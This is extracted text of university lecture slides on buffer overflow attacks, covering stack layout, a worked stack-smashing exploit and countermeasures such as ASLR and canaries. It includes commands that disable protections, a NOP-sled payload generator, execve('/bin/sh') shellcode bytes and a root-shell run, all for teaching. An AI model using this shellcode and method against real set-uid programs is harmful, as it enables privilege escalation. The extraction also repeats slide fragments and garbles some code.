0% found this document useful (0 votes)

6 views

Slides

The document discusses buffer overflow attacks and defenses against them. It covers getting user input to overwrite buffers, exploiting data by overwriting sensitive data or return addresses, and techniques like address randomization and non-executable stacks that aim to prevent such attacks. The document contains 8 sections that cover introduction, recalls of vulnerabilities, how the attacks work, deploying attacks, writing shellcode payloads, countermeasures, defeating address randomization defenses, and defeating non-executable stack defenses.

Uploaded by

rami.fenitra

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

6 views

Slides

Uploaded by

rami.fenitra

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 462

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Ch. 5 - Buffer Overflow

Secure software development and web security

6 Countermeasures

7 Defeating address randomisation

8 Defeating non executable stack

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 2 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Introduction

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 3 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Basic idea

Get out of some buffer

User input
Processing buffers
If careful, the program does not crash
Exploit the data there
Directly, if sensitive
Indirectly, if functional
Rewrite the data there
Overwrite sensitive data
Overwrite return addresses

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 6 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

The memory inside of a process is structured into segments
Usually, there are at least 4 segments1
Text segment (also code segment) : stores program instructions
Often read-only
Data segment : global variables, initialized or not, read only or not
Often divided into .data, .rodata and .bss sub-segments
Static allocation class
Stack : stores local variables, enables function calls
Automatic allocation class
Heap : dynamically allocated memory
new, malloc, delete, free
Dynamic allocation class

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Program memory layout and allocation

When a program runs, it needs memory space to store data

1
Language dependent
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 7 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Illustration
Adress space
High adresses Low adresses
0x00000000

0x04000000

0x08000000

0xFFFFFFFF
Code segment

Data segment
Reserved

Reserved
.rodata
.data
.bss

Heap Stack

User level
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 8 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Allocation example

File alloc.c
1 i n t x = 100; / / . data
2
3 i n t main ( )
4 {
5 in t a = 2; / / stack
6 f l o a t b = 2 . 5 ; / / stack
7
8 s t a t i c i n t y ; / / . bss
9
10 i n t * pt = ( i n t * ) malloc (2 * sizeof ( i n t ) ) ; / / p t on stack , * p t on heap
11 p t [ 0 ] = 5 ; / / on heap
12 p t [ 1 ] = 6 ; / / on heap
13
14 free ( pt ) ;
15 }

Note: the standard garantees storage duration, not location

... but it is most likely how it happens

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 9 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Allocation illustration

rip rsp
496 993
Code segment Stack
488 988
call myfct 490 990

Stack growth
492 992
494 994
myfct
496 996
498
491 998
ret
500 1000
1001

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 13 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Stack frame layout

1 Arguments : function parameters that have been pushed on the
stack
The compiler decides which ones (according to the ABI)
2 Return address : will tell the CPU where to jump when return is
executed
Automatically pushed by call
3 Frame pointer : tells "where the stack is" before we enter a
function
rbp denotes the previous stack frame
rbp + 8 denotes the return address
rbp + 16 denotes the first function parameter passed on the stack

If there is such a parameter

4 Local variables
Stored at rbp - s, where s is the size of the register backups
Always accessed like this, since addresses of local variables cannot
be determined at compile time relatively from the top of the stack
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 14 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Stack frame layout

If there is such a parameter

Preparing the stack

x86-64 ABI states that, when a function is called,
the six first "integer" parameters are passed via registers,
other non-floating parameters are passed via the stack,
some registers must be preserved.
Register Usage Preserved?
rax 1st return register No
rbx Temporary register Yes
rcx, rdx,
rsi, rdi, 6 first integer function parameters No
r8, r9
r10, r11 Temporary register No
r12, r13,
Temporary register Yes
r14, r15
rsp Stack pointer Yes
rbp Stack frame pointer Yes
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 15 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Preparing the stack

Code sample

1 ...
2
3 main :
4 mov rdi , 1 ; f i r s t param
5 mov rsi , 2 ; second param
6 mov rdx , 3 ; t h i r d param
7 mov rcx , 4 ; f o u r t h param
8 mov r8 , 5 ; f i f t h param
9 mov r9 , 6 ; s i x t h param
10 push qword 8 ; e i g h t param
11 push qword 7 ; seventh param
12
13 call sum
14
15 sum :
16 enter 0 , 0 ; c r e a t e s s t a c k frame ( backs up rbp , rbp p o i n t s t h e r e now )
17
18 push rbx ; saves r e g i s t e r s preserved by f u n c t i o n c a l l
19 push r12
20 push r13
21 push r14
22 push r15
23
24 ...

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 16 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Stack frame layout

Stack growth

928 930 932 934 936 938 940 942 944 946 948 950 952 954 956 958 960 962 964 966 968 970 972 974 976 978 980 982 984 986 988 990 992 994 996 998 1000

rip Backup
7 8
rsp
977

Stack state before enter

Stack growth

928 930 932 934 936 938 940 942 944 946 948 950 952 954 956 958 960 962 964 966 968 970 972 974 976 978 980 982 984 986 988 990 992 994 996 998 1000

r15 backup r14 backup r13 backup r12 backup rbx backup rbp backup rip backup
7 8
rbp
rsp
rbp + 16 rbp + 24
929 969

Stack state after stack frame is ready

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 17 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Before copying, memory needs to be allocated in the destination

Question
What if an unsufficient amount of memory is allocated ?

Buffer overflow
The result is not always a crash
It can allow an attacker to take complete control of a program
And its priviledges rights

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 20 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Example

File str-cpy.c
1 void d o S t u f f ( const char * s )
2 {
3 char d e s t [ 1 3 ] ;
4 s t r c p y ( dest , s ) ; / / ok
5
6 char dest2 [ 1 2 ] ;
7 s t r c p y ( dest2 , s ) ; / / overflow
8
9 const char * s2 = "My r e a l l y l o n g b e a u t i f u l s t r i n g " ;
10 s t r c p y ( dest2 , s2 ) ; / / o v e r f l o w
11 }
12
13 i n t main ( )
14 {
15 const char * s = " Hello there ! " ;
16
17 p r i n t f (%zu , s t r l e n ( s ) ) ; / / 12
18 p r i n t f (%zu , s i z e o f s ) ; / / 13 −> n u l l t e r m i n a t o r i n c l u d e d
19
20 doStuff ( s ) ;
21 }

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 21 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Illustration

High addresses
main stack frame

Stack growth
Return adress
doStuff stack frame

Previous frame pointer

Buffer copy
Register backups

Low addresses
dest2[11]

..
.

dest2[0]

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 22 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

2D20 critical strike

strcpy does not stop until it sees ’\0’
The space on the stack above the destination buffer includes
critical values
The return adress and the previous frame pointer
If the return adress is overwritten by buffer overflow, the CPU will
jump "somewhere else"
Possible scenarios
The new adress (virtual) is not mapped to a physical one : crash
The new adress is mapped to a protected space : segmentation
fault
The new adress is mapped to an unprotected space that does not
correspond to an instruction : crash
The new adress is mapped to an unprotected space that
corresponds to an instruction : the program keeps running
What if we make the program jump on something malicious we
wrote ?
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 23 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

We need to know where

1 the entry point of our malicous code is
2 the return address is
If we fail, we will most likely cause a segmentation fault

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 26 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Illustration

Stack before buffer copy badfile Stack after buffer copy

Malicious code Malicious code

(Overwritten) jmp
Arguments

Return adress + New adress Ñ New return adress

Previous frame pointer
buffer[99]
rbp
.. (Overwritten)
.
buffer[0]

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 27 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Deploying the attack

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 28 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Disabling some protections

Disabling some protections

Buffer overflow has a long history

Common protections
Address randomisation : makes the location of functions, stack,
heap and libraries hard to guess
Non executable stack
Canaries

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 29 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Setup

Ubuntu 12.04 LTS2

Disable address randomisation
1 ssd@ssd−vb : ~ $ sudo s y s c t l −w k e r n e l . randomize_va_space=0
2 k e r n e l . randomize_va_space=0

Make the stack executable

Disable Stack-Guard
1 ssd@ssd−vb : ~ $ gcc −o o v e r f l o w −z execstack −fno − stack − p r o t e c t o r o v e r f l o w . c

Make the program set-uid

1 ssd@ssd−vb : ~ $ sudo chown r o o t o v e r f l o w
2 ssd@ssd−vb : ~ $ sudo chmod 4755 o v e r f l o w

2
http://be.releases.ubuntu.com/12.04/ - Support ended on April 28,
2017
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 30 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address of the malicious code

If we want to jump to our malicious code, we need to know what

its entry point is
The address of the first instruction to execute
We know that our code will be copied into a buffer on the stack
We don’t know the address of that buffer
Depends on the program’s stack usage
We know the offset of our malicious code
We need to know the address of copy_stuff stack frame to
know where our malicious code will be stored
The target program is unlikely to give that information
We have to guess

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 31 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address of the malicious code

If we want to jump to our malicious code, we need to know what

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 31 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address of the malicious code

If we want to jump to our malicious code, we need to know what

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 31 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address of the malicious code

If we want to jump to our malicious code, we need to know what

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 31 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address of the malicious code

If we want to jump to our malicious code, we need to know what

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 31 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address of the malicious code

If we want to jump to our malicious code, we need to know what

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 31 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address of the malicious code

If we want to jump to our malicious code, we need to know what

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 31 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address of the malicious code

If we want to jump to our malicious code, we need to know what

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 31 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address of the malicious code

If we want to jump to our malicious code, we need to know what

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 31 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Magic Mirror in my hand

In theory, the search space has size 232 on a 32 bits machine
Our VM is 32 bits

Good news : is is much smaller in practice

Good news : is is much smaller in practice

Searching for the address of the malicious code should not be a

nightmare
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 32 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Example

File stack-frame-adress.c
1 # include < s t d i o . h>
2
3 void f o o ( i n t * p t i )
4 {
5 p r i n t f ( " Adress o f param : %p \ n " , & p t i ) ;
6 }
7
8 i n t main ( )
9 {
10 i n t x = 42;
11
12 p r i n t f ( " Adress o f x : %p \ n " , &x ) ;
13 p r i n t f ( " Adress o f f o o : %p \ n " , f o o ) ;
14 f o o (& x ) ;
15 }

We will compile the program and run it in two environments

With address randomisation (hard)
Without address randomisation (easy)
We will see later that we can bypass randomisation

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 33 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Result

1 ssd@ssd−vb : ~ $ gcc −o stack −frame −address stack −frame −address . c

2 ssd@ssd−vb : ~ $ . / stack −frame −address
3 Address o f x : 0xbfb43fbc
4 Address o f f o o : 0x80483e4
5 Address o f param : 0 xb f b 4 3 fa 0
6 ssd@ssd−vb : ~ $ . / stack −frame −address
7 Address o f x : 0 xbfd3c03c
8 Address o f f o o : 0x80483e4
9 Address o f param : 0xbfd3c020
10 ssd@ssd−vb : ~ $ sudo s y s c t l −w k e r n e l . randomize_va_space=0
11 k e r n e l . randomize_va_space=0
12 ssd@ssd−vb : ~ $ gcc −o stack −frame −address stack −frame −address . c
13 ssd@ssd−vb : ~ $ . / stack −frame −address
14 Address o f x : 0xbffff35c
15 Address o f f o o : 0x80483e4
16 Address o f param : 0xbffff340
17 ssd@ssd−vb : ~ $ . / stack −frame −address
18 Address o f x : 0xbffff35c
19 Address o f f o o : 0x80483e4
20 Address o f param : 0xbffff340

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 34 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Improving chances at guessing

If we override the return address with something invalid, we will
most likely cause a segmentation fault
It would be nice to have several entry points

Without NOP With NOP

Malicious code Malicious code

NOP
(Overwritten) NOP
jmp NOP jmp
New return adress New return adress

rbp rbp
(Overwritten) (Overwritten)

Inaccurate guess - Failure Inaccurate guess - Success

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 36 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address without guessing

In the case of a local attack, we can investigate

Set-uid programs
Copy the target program, and derive the address for the injected
code
Harder in the case of remote attacks
A common way of investigating : use gdb
Find out where frame pointer is when copy_stuff is called
Note that we will debug with normal privileges
No escalation possible this way

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 37 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address without guessing

In the case of a local attack, we can investigate

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 37 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address without guessing

In the case of a local attack, we can investigate

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 37 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address without guessing

In the case of a local attack, we can investigate

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 37 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address without guessing

In the case of a local attack, we can investigate

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 37 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address without guessing

In the case of a local attack, we can investigate

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 37 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Finding the address without guessing

In the case of a local attack, we can investigate

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 37 / 92

With gdb, set a breakpoint at copy_stuff

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 38 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

The goal

First possible Malicious code

entry point of
our program NOP
..
.
What we NOP
write here will rbp + 16
Return address field
overwrite the rbp + 8
NOP
return address
..
∆ .

NOP
Start of buffer

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 39 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Using gdb

1 ssd@ssd−vb : ~ $ gcc −z execstack −fno − stack − p r o t e c t o r −g −o o v e r f l o g o v e r f l o w . c

2 ssd@ssd−vb : ~ $ touch b a d f i l e
3 ssd@ssd−vb : ~ $ gdb o v e r f l o g
4 GNU gdb ( Ubuntu / L i n a r o 7.4.2012 −04 −0 ubuntu2 . 1 ) 7.4 −2012.04
5 ...
6 ( gdb ) b c o p y _ s t u f f
7 B r e a k p o i n t 1 a t 0x80484ed : f i l e o v e r f l o w . c , l i n e 1 0 .
8 ( gdb ) run
9 S t a r t i n g program / home / ssd / Documents / ssd − b u f f e r − o v e r f l o w / o v e r f l o g
10
11 B r e a k p o i n t 1 , c o p y _ s t u f f ( s t r =0 x b f f f f 1 8 c " . . . " ) a t o v e r f l o w . c : 1 0
12 10 strcpy ( buffer , s t r )
13 ( gdb ) p $ebp
14 $1 = ( v o i d * ) 0 x b f f f f 1 6 8
15 ( gdb ) p & b u f f e r
16 $2 = ( char ( * ) [ 1 0 0 ] ) 0 x b f f f f 0 f c
17 ( gdb ) p 0 x b f f f f 1 6 8 − 0 x b f f f f 0 f c
18 $3 = 108
19 ( gdb ) q u i t
20 ...

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 40 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Writing badfile

Basically, we want to execute /bin/sh

That is what we want to load onto the stack
We also want to call execve
We need to load code associated with this step on the stack
This is called a shell code
We also want to fill everything else with NOP
We do not want to enter on rbp + 16
That address was identified using gdb
The stack frame will most likely different
gdb adds information, at the beginning
We have to jmp higher
The address after the shift we use to jump cannot contain a zero
byte
Otherwise, strcpy will stop prematurely

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 41 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Our malicious code

File malicious.c
1 # include < s t d l i b . h>
2 # include < s t d i o . h>
3 # include < s t r i n g . h>
4
5 const char s h e l l c o d e [ ] = . . . ; / / g o a l o f what we w r i t e here : run a r b i t r a r y command
6
7 i n t main ( )
8 {
9 char b u f f e r [ 2 0 0 ] ;
10
11 / / f i l l b u f f e r w i t h NOP
12 memset(& b u f f e r , 0x90 , 2 0 0 ) ;
13
14 / / guess a v a l i d e n t r y p o i n t
15 * ( ( long * ) ( b u f f e r + 1 1 2 ) ) = 0 x b f f f f 1 6 8 + 0x90 ; / / 0x90 i s chosen w i t h t r i a l and f a i l
16
17 / / put the shellcode a f t e r b u f f e r
18 memcpy ( b u f f e r + s i z e o f ( b u f f e r ) − s i z e o f ( s h e l l c o d e ) ,
19 shellcode , sizeof ( shellcode ) ) ;
20
21 / / output
22 FILE * b a d f i l e = fopen ( " . / b a d f i l e " , "w" ) ;
23 f w r i t e ( b u f f e r , 200 , 1 , b a d f i l e ) ;
24 fclose ( badfile ) ;
25 }

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 42 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Running the attack

1 ssd@ssd−vb : ~ $ rm b a d f i l e
2 ssd@ssd−vb : ~ $ gcc −o m a l i c i o u s malicous . c
3 ssd@ssd−vb : ~ $ . / m a l i c i o u s
4 ssd@ssd−vb : ~ $ . / o v e r f l o w
5 #
6 # id
7 u i d =0( r o o t ) g i d =1000( ssd ) groups =0( r o o t ) , . . .

We want to run an arbitrary command

We would very much like that command to be /bin/sh
We want to launch it with the execve system call

Naïve idea
Write a C code launching execve on /bin/sh
Compile it
Input the binary code as badfile

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 45 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Example

File naive.c
1 # include < u n i s t d . h>
2
3 i n t main ( )
4 {
5 char * cmd [ 2 ] = { " / b i n / sh " , NULL } ;
6 execve ( cmd [ 0 ] , cmd , NULL ) ;
7 }

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 46 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Why it doesn’t work

Main idea
Write the program directly using assembly language
The binary code associated with that program is called a
shellcode3
The basic idea is to set up registers to use the execve system
call
With proper parameters

Parameters in x86
1 eax : service number
The number for execve is 11
2 ebx, ecx, edx : parameters
ebx : the address of "/bin/sh"
ecx : address of the argument array
edx : environment variables (not needed here)
3
One, A. : Smashing the stack for fun and profit - Phrack 7:49 - 1996
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 48 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Setting ebx

To find the address of "/bin/sh"

We push it on the stack
We deduce its address from esp
We don’t want to induce a zero in the code
1 xor eax, eax sets rax to zero without inducing a zero int he code

We can’t write mov eax, 0

We use the same technique as the one used for "/bin/sh"

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 50 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Final touches

1 Set edx to zero

We can xor it with itself
We can also use cdq (convert double to quad) that has the side
effect of setting edx to zero with a single byte instruction
2 Calling execve in x86
The op code of execve is 11
mov byte eax, 11
Call interruption with int 0x80
3 We still need to find out what the binary code for all of these steps
is

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 51 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Execution of our shellcode

Malicious code

NOP
..
.
NOP
0 11 rax
//sh
0x2000 /bin rcx
0
rsp 0x2000 rbx

0 rbx

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 52 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Correspondence between assembly and binary

Any assembly instruction can be directly mapped to binary code

We need to find the binary code of the code preparing the data
We will use that as our shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 53 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Correspondence between assembly and binary

Any assembly instruction can be directly mapped to binary code

Only the first Op code byte is mandatory

Prefix Op code Shift Immediate

ModR.M
SIB
We need to find the binary code of the code preparing the data
We will use that as our shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 53 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Correspondence between assembly and binary

Any assembly instruction can be directly mapped to binary code

Only the first Op code byte is mandatory

Prefix Op code Shift Immediate

ModR.M
SIB
We need to find the binary code of the code preparing the data
We will use that as our shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 53 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Correspondence between assembly and binary

Any assembly instruction can be directly mapped to binary code

Only the first Op code byte is mandatory

Prefix Op code Shift Immediate

ModR.M
SIB
We need to find the binary code of the code preparing the data
We will use that as our shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 53 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

The assembly code

Code in 32 bits : because so is our VM

We need to push /bin/sh in two steps
We can only push 4 bytes at a time on the stack
1 xor eax , eax ; 31 C0
2 push eax ; 50
3 push 0x68732F2F ; 68 2F 2F 73 68 −> push " / / sh "
4 push 0x6e69622F ; 68 2F 62 69 6E −> push " / b i n "
5 mov esp , ebx ; 89 E3
6 push eax ; 50
7 push ebx ; 53
8 mov esp , ecx ; 89 E1
9 cdq ; 99
10 mov byte 0x0b , a l ; B0 0B −> mov eax , 11
11 i n t 0x80 ; CD 80

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 54 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Our shellcode in C

File malicious.c
1 char s h e l l c o d e [ ] =
2 " \ x31 \ xc0 " /* x o r eax , eax * /
3 " \ x50 " /* push eax * /
4 " \ x68 " " / / sh " /* push 0x68732F2F * /
5 " \ x68 " " / b i n " /* push 0x6e69622F * /
6 " \ x89 " " \ xe3 " /* mov esp , ebx * /
7 " \ x50 " /* push eax * /
8 " \ x53 " /* push ebx * /
9 " \ x89 \ xe1 " /* mov esp , ecx * /
10 " \ x99 " /* cdq * /
11 " \ xb0 \ x0b " /* move b y t e 11 , a l * /
12 " \ xcd \ x80 " /* i n t 0x80 * /
13 ;

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 55 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Countermeasures

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 56 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Use safer functions

Use safer functions

Some memory copy functions rely on special characters to decide

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 57 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Safer dynamic linking

Program static analyser

Compilers are responsible to translate source code into binary

They control what will eventually become the executable
They can implicitly insert data to
check stack integrity
eliminate conditions necessary for buffer overflow
Two main compiler-based countermeasures
Stackshield4
StackGuard5 (canaries)
Idea behind Stackshield : store a backup of the return address at
a safer place
That safer place cannot be overflown
When hitting return, we chack that the return address is the same
as the backup
4
Angelfire.com - 2000
5
Cowa et al - 1998
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 61 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Hardware

Our attack relies on executing the shellcode

Our attack relies on executing the shellcode

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 63 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Defeating address randomisation

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 64 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

The need for information

The point of ASLR

The point of ASLR

If the location of the start of the stack is randomised, guesses are

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 66 / 92

